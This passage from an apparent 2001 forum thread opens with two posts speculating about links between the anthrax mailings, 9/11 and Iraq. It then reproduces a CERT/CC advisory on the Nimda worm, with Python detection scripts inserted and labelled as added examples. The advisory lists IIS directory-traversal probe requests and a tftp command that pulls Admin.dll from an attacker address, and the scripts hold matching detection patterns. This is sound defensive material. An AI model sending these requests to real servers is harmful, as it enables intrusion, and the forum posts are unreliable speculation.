23 posted on 11/16/2001 1:09:57 PM PST by AgThorn
To: Mitchell
I agree completely. I'll be quite surprised if the anthrax mailings turn out to be unconnected to the 9/11 attacks and probably Iraq.
Careful with the quick agreement ... someone will be sizing ME up for a tinfoil hat soon!! ;-)
24 posted on 11/16/2001 1:10:37 PM PST by AgThorn
Comment #25 Removed by Moderator
Original release date: September 18, 2001 Revised: September 25, 2001 Source: CERT/CC
A complete revision history is at the end of this file.
Systems Affected
- Systems running Microsoft Windows 95, 98, ME, NT, and 2000
Overview
The CERT/CC has received reports of new malicious code known as the "W32/Nimda worm" or the "Concept Virus (CV) v.5." This new worm appears to spread by multiple mechanisms:
- from client to client via email
- from client to client via open network shares
- from web server to client via browsing of compromised web sites
- from client to web server via active scanning for and exploitation of various Microsoft IIS 4.0 / 5.0 directory traversal vulnerabilities (VU#111677 and CA-2001-12)
- from client to web server via scanning for the back doors left behind by the "Code Red II" (IN-2001-09) and "sadmind/IIS" (CA-2001-11) worms
The worm modifies web documents (e.g., .htm, .html, and .asp files) and certain executable files found on the systems it
infects, and creates numerous copies of itself under various file names.
We have also received reports of denial of service as a result of network scanning and email propagation.
I. Description
The Nimda worm has the potential to affect both user workstations (clients) running Windows 95, 98, ME, NT, or 2000 and
servers running Windows NT and 2000.
Email Propagation
This worm propagates through email arriving as a MIME "multipart/alternative" message consisting of two sections. The first section is defined as MIME type "text/html", but it contains no text, so the email appears to have no content. The second section is defined as MIME type "audio/x-wav", but it contains a base64-encoded attachment named "readme.exe", which is a binary executable.
Due to a vulnerability described in CA-2001-06 (Automatic Execution of Embedded MIME Types), any mail software running on an x86 platform that uses Microsoft Internet Explorer 5.5 SP1 or earlier (except IE 5.01 SP2) to render the HTML mail automatically runs the enclosed attachment and, as a result, infects the machine with the worm. Thus, in vulnerable configurations, the worm payload will automatically be triggered by simply opening (or previewing) this mail message. As an executable binary, the payload can also be triggered by simply running the attachment.
The email message delivering the Nimda worm appears to also have the following characteristics:
- The text in the subject line of the mail message appears to be variable.
- There appear to be many slight variations in the attached binary file, causing the MD5 checksum to be different when one
compares different attachments from different email messages. However, the file length of the attachment appears to consistently
be 57344 bytes.
The worm also contains code that will attempt to resend the infected email messages every 10 days.
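The MIME layout just described (a blank text/html section alongside an audio/x-wav section that really carries an executable) is something a mail gateway can check for mechanically. The following is an added example, not code from the CERT advisory: it constructs a message with that shape and runs a content-type sanity check over each part. The sender and recipient addresses, the boundary string, the list of executable extensions and the padded stand-in for the worm body are assumptions of this example; the readme.exe name, the audio/x-wav declaration and the 57344-byte length are taken from the advisory.

```python
"""Flag mail with the Nimda delivery structure described in the advisory.

Added example, not part of the CERT advisory. It parses a message and reports
parts whose declared MIME type does not fit their content: a text/html
section with no text, and an audio/x-wav section that actually carries an
executable (readme.exe). The message built below is constructed for this
example; only its overall shape follows the advisory.
"""
import base64
from email import message_from_string
from email.message import Message

# Attachment length the advisory reports as consistent across samples.
NIMDA_ATTACHMENT_SIZE = 57344
# Extensions that should never travel as an "audio" or "text" part (assumed list).
EXECUTABLE_EXTENSIONS = (".exe", ".com", ".scr", ".pif", ".bat", ".vbs")


def part_findings(part: Message) -> list:
    """Return human-readable findings for one non-multipart MIME part."""
    findings = []
    ctype = part.get_content_type()
    filename = (part.get_filename() or "").lower()
    payload = part.get_payload(decode=True) or b""

    if filename.endswith(EXECUTABLE_EXTENSIONS):
        findings.append(f"executable attachment name '{filename}' in {ctype} part")
    # A Win32 executable starts with the DOS "MZ" header; it has no business
    # inside a part declared as audio or text.
    if payload[:2] == b"MZ" and not ctype.startswith("application/"):
        findings.append(f"PE (MZ) header inside part declared as {ctype}")
    if len(payload) == NIMDA_ATTACHMENT_SIZE:
        findings.append(f"attachment length {NIMDA_ATTACHMENT_SIZE} matches Nimda samples")
    if ctype == "text/html" and not payload.strip():
        findings.append("empty text/html part (message appears blank)")
    return findings


def inspect_message(raw: str) -> dict:
    """Walk every part of a raw RFC 2822 message and collect findings."""
    msg = message_from_string(raw)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        findings.extend(part_findings(part))
    # An empty HTML body on its own is harmless; anything else is suspicious.
    serious = [f for f in findings if not f.startswith("empty text/html")]
    return {"suspicious": bool(serious), "findings": findings}


def build_sample_message(payload: bytes) -> str:
    """Construct a message with the advisory's shape for demonstration."""
    boundary = "part-boundary-7f3a"
    b64 = base64.encodebytes(payload).decode("ascii")
    return (
        "From: sender@example.net\n"
        "To: recipient@example.org\n"
        "Subject: \n"
        "MIME-Version: 1.0\n"
        f'Content-Type: multipart/alternative; boundary="{boundary}"\n'
        "\n"
        f"--{boundary}\n"
        "Content-Type: text/html; charset=us-ascii\n"
        "Content-Transfer-Encoding: 7bit\n"
        "\n"
        "\n"
        f"--{boundary}\n"
        "Content-Type: audio/x-wav; name=readme.exe\n"
        "Content-Transfer-Encoding: base64\n"
        "\n"
        f"{b64}"
        f"--{boundary}--\n"
    )


if __name__ == "__main__":
    # Constructed stand-in for the worm body: a DOS/PE header followed by padding.
    fake_exe = b"MZ" + b"\x00" * (NIMDA_ATTACHMENT_SIZE - 2)
    for line in inspect_message(build_sample_message(fake_exe))["findings"]:
        print(line)
```

The check deliberately does not trust the declared content type: the rendering bug in CA-2001-06 is triggered precisely because the client believes the "audio/x-wav" label, so a gateway has to look at the attachment name and the first bytes of the decoded body instead.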
Payload
The email addresses targeted for receiving the worm are harvested from two sources:
- the .htm and .html files in the user's web cache folder
- the contents of the user's email messages retrieved via the MAPI service
These files are passed through a simple pattern matcher which collects strings that look like email addresses. These addresses
then receive a copy of the worm as a MIME-encoded email attachment. Nimda stores the time the last batch of emails were sent
in the Windows registry, and every 10 days will repeat the process of harvesting addresses and sending the worm via email.
Likewise, the client machines begin scanning for vulnerable IIS servers. Nimda looks for backdoors left by previous IIS
worms: Code Red II [IN-2001-09] and sadmind/IIS worm [CA-2001-11]. It also attempts to exploit various IIS Directory Traversal vulnerabilities (VU#111677 and CA-2001-12). The selection of potential target IP addresses follows these rough probabilities:
- 50% of the time, an address with the same first two octets will be chosen
- 25% of the time, an address with the same first octet will be chosen
- 25% of the time, a random address will be chosen
The infected client machine attempts to transfer a copy of
the Nimda code via tftp (69/UDP) to any IIS server that it scans and finds to be vulnerable.
Once running on the server machine, the worm traverses each directory in the system (including all those accessible through
file shares) and writes a MIME-encoded copy of itself to disk using file names with .eml or .nws extensions (e.g., readme.eml).
When a directory containing web content (e.g., HTML or ASP files) is found, the following snippet of Javascript code is appended
to every one of these web-related files:
This modification of web content allows further propagation of the worm to new clients through a web browser or through
the browsing of a network file system.
In order to further expose the machine, the worm
- enables the sharing of the c: drive as C$
- creates a "Guest" account on Windows NT and 2000 systems
- adds this account to the "Administrator" group.
Furthermore, the Nimda worm infects existing binaries on the system by creating Trojan horse copies of legitimate applications.
These Trojan horse versions of the applications will first execute the Nimda code (further infecting the system and potentially
propagating the worm), and then complete their intended function.
Browser Propagation
As part of the infection process, the Nimda worm modifies all web content files it finds (including, but not limited to, files with .htm, .html, and .asp extensions). As a result, any user browsing web content on the system, whether via the file system or via a web server, may download a copy of the worm. Some browsers may automatically execute the downloaded copy, thereby infecting the browsing system.
File System Propagation
The Nimda worm creates numerous MIME-encoded copies of itself (using file names with .eml and .nws extensions) in all writable directories (including those found on a network share) to which the user has access. If a user on another system subsequently selects the copy of the worm file on the shared network drive in Windows Explorer with the preview option enabled, the worm may be able to compromise that system.
Additionally, by creating Trojan horse versions of legitimate applications already installed on the system, users may unknowingly
trigger the worm when attempting to make use of these programs.
System FootPrint
The scanning activity of the Nimda worm produces the following log entries for any web server listening on port 80/tcp:
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
Note: The first four entries in these sample logs denote attempts to connect to the backdoor left by Code Red II, while
the remaining log entries are examples of exploit attempts for the Directory Traversal vulnerability.
II. Impact
Intruders can execute arbitrary commands within the LocalSystem security context on machines running the unpatched versions of IIS. In the case where a client is compromised, the worm will be run with the same privileges as the user who triggered it. Hosts that have been compromised are also at high risk for being party to attacks on other Internet sites.
The high scanning rate of the Nimda worm may also cause bandwidth denial-of-service conditions on networks with infected
machines.
III. Solutions
Recommendations for System Administrators of IIS machines
To determine if your system has been compromised, look for the following:
- a root.exe file (indicates a compromise by Code Red II or sadmind/IIS worms making the system vulnerable to the Nimda
worm)
- an Admin.dll file in the root directory of c:\, d:\, or e:\ (Note that the file name Admin.dll may be legitimately installed
by IIS in other directories.)
- unexpected .eml or .nws files in numerous directories
- the presence of this string: /c+tftp%20-i%20x.x.x.x%20GET%20Admin.dll%20d:\Admin.dll 200
in the IIS logs, where "x.x.x.x" is the IP address of the attacking system. (Note that only the "200" result code indicates
success of this command.)
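The footprint listed under "System FootPrint" and the tftp/Admin.dll indicator in the checklist above are both plain string patterns in the IIS log, so they can be matched mechanically rather than by eye. The following added example (not from the CERT advisory) runs such a classifier over a handful of constructed log lines in IIS W3C extended format; the field layout, the label names, the client addresses and the assumption that the overlong UTF-8 sequences may be logged either as raw bytes (as the advisory prints them) or as %c0%af-style escapes are all choices of this example.

```python
"""Classify Nimda probe traffic in IIS logs.

Added example, not part of the CERT advisory. It labels each request in a
set of constructed W3C extended log lines using the footprint the advisory
lists: probes for the root.exe / cmd.exe backdoor left by Code Red II and
sadmind/IIS, Unicode and double-decode directory traversal attempts, and
the tftp retrieval of Admin.dll whose 200 result marks a successful upload.
Field layout, label names and addresses are assumptions of this example.
"""
import re
from collections import Counter

# The first four footprint entries: the backdoor left by Code Red II / sadmind.
BACKDOOR_STEMS = {
    "/scripts/root.exe",
    "/msadc/root.exe",
    "/c/winnt/system32/cmd.exe",
    "/d/winnt/system32/cmd.exe",
}

# ".." followed by an encoded or literal separator, as in the remaining
# entries: %5c, %2f, the double-decoded %35c, and the overlong UTF-8 bytes
# the advisory prints as \xc0.. / \xc1.. (assumed: some servers log them as %c0%af).
TRAVERSAL_RE = re.compile(
    r"\.\.(?:%5c|%2f|%35c|\\xc[01]\\x[0-9a-f]{2}|%c[01]%[0-9a-f]{2}|/|\\)",
    re.IGNORECASE,
)

# Constructed lines: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = r"""
2001-09-18 14:02:11 192.0.2.10 GET /scripts/root.exe /c+dir 404
2001-09-18 14:02:11 192.0.2.10 GET /MSADC/root.exe /c+dir 404
2001-09-18 14:02:12 192.0.2.10 GET /c/winnt/system32/cmd.exe /c+dir 404
2001-09-18 14:02:12 192.0.2.10 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 14:02:13 192.0.2.10 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 14:02:13 192.0.2.10 GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe /c+dir 200
2001-09-18 14:02:13 192.0.2.10 GET /scripts/..%35c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 14:02:14 192.0.2.10 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20192.0.2.10%20GET%20Admin.dll%20d:\Admin.dll 200
2001-09-18 14:05:00 198.51.100.7 GET /index.html - 200
2001-09-18 14:05:01 198.51.100.7 GET /images/logo.gif - 200
"""


def classify_request(stem: str, query: str, status: int) -> str:
    """Label one request; checks run in order of how much they tell the defender."""
    stem_l, query_l = stem.lower(), query.lower()
    if "tftp" in query_l and "admin.dll" in query_l:
        # Attempt to pull the worm body onto the server; only 200 means it worked.
        return "nimda-upload-success" if status == 200 else "nimda-upload-attempt"
    if stem_l in BACKDOOR_STEMS:
        return "codered2-backdoor-probe"
    if "cmd.exe" in stem_l and TRAVERSAL_RE.search(stem):
        return "iis-traversal-attempt"
    return "benign"


def parse_line(line: str):
    """Split a W3C extended log line into (client_ip, stem, query, status)."""
    fields = line.split()
    if len(fields) != 7:
        return None
    _date, _time, c_ip, _method, stem, query, status = fields
    return c_ip, stem, "" if query == "-" else query, int(status)


def scan_log(text: str):
    """Return label counts and the client addresses that sent Nimda-style requests."""
    counts = Counter()
    suspects = set()
    for line in text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        c_ip, stem, query, status = parsed
        label = classify_request(stem, query, status)
        counts[label] += 1
        if label != "benign":
            suspects.add(c_ip)
    return counts, suspects


if __name__ == "__main__":
    counts, suspects = scan_log(SAMPLE_LOG)
    for label, n in sorted(counts.items()):
        print(f"{label:28s} {n}")
    print("hosts to isolate/check:", ", ".join(sorted(suspects)))
```

A probe that returns 404 tells you only that a worm instance exists on the client side; the tftp line with a 200 result is the one that should trigger the rebuild procedure in this section, which is why the classifier keys the "success" label on the status code exactly as the advisory's note does.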
The only safe way to recover from the system compromise is to format the system drive(s) and reinstall the system software
from trusted media (such as vendor-supplied CD-ROM). Additionally, after the software is reinstalled, all vendor-supplied
security patches must be applied. The recommended time to do this is while the system is not connected to any network. However,
if sufficient care is taken to disable all server network services, then the patches can be downloaded from the Internet.
Detailed instructions for recovering your system can be found in the CERT/CC tech tip:
- Steps for Recovering from a UNIX or NT System Compromise
Apply the appropriate patch from your vendor
A cumulative patch which addresses all of the IIS-related vulnerabilities exploited by the Nimda worm is available from
Microsoft at
- http://www.microsoft.com/technet/security/bulletin/MS01-044.asp
Recommendations for Network Administrators
Ingress filtering
Ingress filtering manages the flow of traffic as it enters a network under your administrative control. Servers are typically the only machines that need to accept inbound connections from the public Internet. In the network usage policy of many sites, there are few reasons for external hosts to initiate inbound connections to machines that provide no public services. Thus, ingress filtering should be performed at the border to prohibit externally initiated inbound connections to non-authorized services. With Nimda, ingress filtering of port 80/tcp could prevent instances of the worm outside of your network from scanning or infecting vulnerable IIS servers in the local network that are not explicitly authorized to provide public web services. Filtering of port 69/udp will also prevent the downloading of the worm to IIS via tftp.
Cisco has published a tech tip specifically addressing filtering guidelines to mitigate the impact of the Nimda worm at
- http://www.cisco.com/warp/public/63/nimda.shtml
Egress filtering
Egress filtering manages the flow of traffic as it leaves a network under your administrative control. There is typically limited need for machines providing public services to initiate outbound connections to the Internet. In the case of Nimda, employing egress filtering on port 69/udp at your network border will prevent certain aspects of the worm's propagation both to and from your network.
Recommendations for End User Systems
Apply the appropriate patch from your vendor
If you are running a vulnerable version of Internet Explorer (IE), the CERT/CC recommends upgrading to at least version 5.0, since older versions are no longer officially maintained by Microsoft. Users of IE 5.0 and above are encouraged to apply the patch for the "Automatic Execution of Embedded MIME Types" vulnerability available from Microsoft at
- http://www.microsoft.com/technet/security/bulletin/MS01-020.asp
Note: IE 5.5 SP1 users should apply the patches discussed in MS01-027
Run and Maintain an Anti-Virus Product
It is important for users to update their anti-virus software. Most anti-virus software vendors have released updated information,
tools, or virus databases to help detect and partially recover from this malicious code. A list of vendor-specific anti-virus
information can be found in Appendix A.
Many anti-virus packages support automatic updates of virus definitions. We recommend using these automatic updates when
available.
Don't open e-mail attachments
The Nimda worm may arrive as an email attachment named "readme.exe". Users should not open this attachment.
Disable JavaScript
End-user systems can become infected with the Nimda worm by browsing web sites hosted by infected servers. This method
of infection requires the use of JavaScript to be successful. Therefore, the CERT/CC recommends that end user systems disable
JavaScript until all appropriate patches have been applied and anti-virus software has been updated.
Appendix A. Vendor Information
Antivirus Vendor Information
Aladdin Knowledge Systems
- http://www.eSafe.com/home/csrt/valerts2.asp?virus_no=10087
Central Command, Inc.
- http://support.centralcommand.com/cgi-bin/command.cfg/php/enduser/std_adp.php?p_refno=010918-000005
Command Software Systems
- http://www.commandsoftware.com/virus/nimda.html
Computer Associates
- http://www.ca.com/virusinfo/encyclopedia/descriptions/n/nimda.htm
F-Secure Corp
- http://www.fsecure.com/v-descs/nimda.shtml
McAfee
- http://vil.mcafee.com/dispVirus.asp?virus_k=99209&
Panda Software
- http://service.pandasoftware.es/library/card.jsp?Virus=Nimda
Proland Software
- http://www.pspl.com/virus_info/worms/nimda.htm
Sophos
- http://www.sophos.com/virusinfo/analyses/w32nimdaa.html
Symantec
- http://www.symantec.com/avcenter/venc/data/w32.nimda.a@mm.html
Trend Micro
- http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=TROJ_NIMDA.A
- http://www.antivirus.com/pc-cillin/vinfo/virusencyclo/default5.asp?VName=TROJ_NIMDA.A
References
You may wish to visit the CERT/CC's computer virus resources page located at
http://www.cert.org/other_sources/viruses.html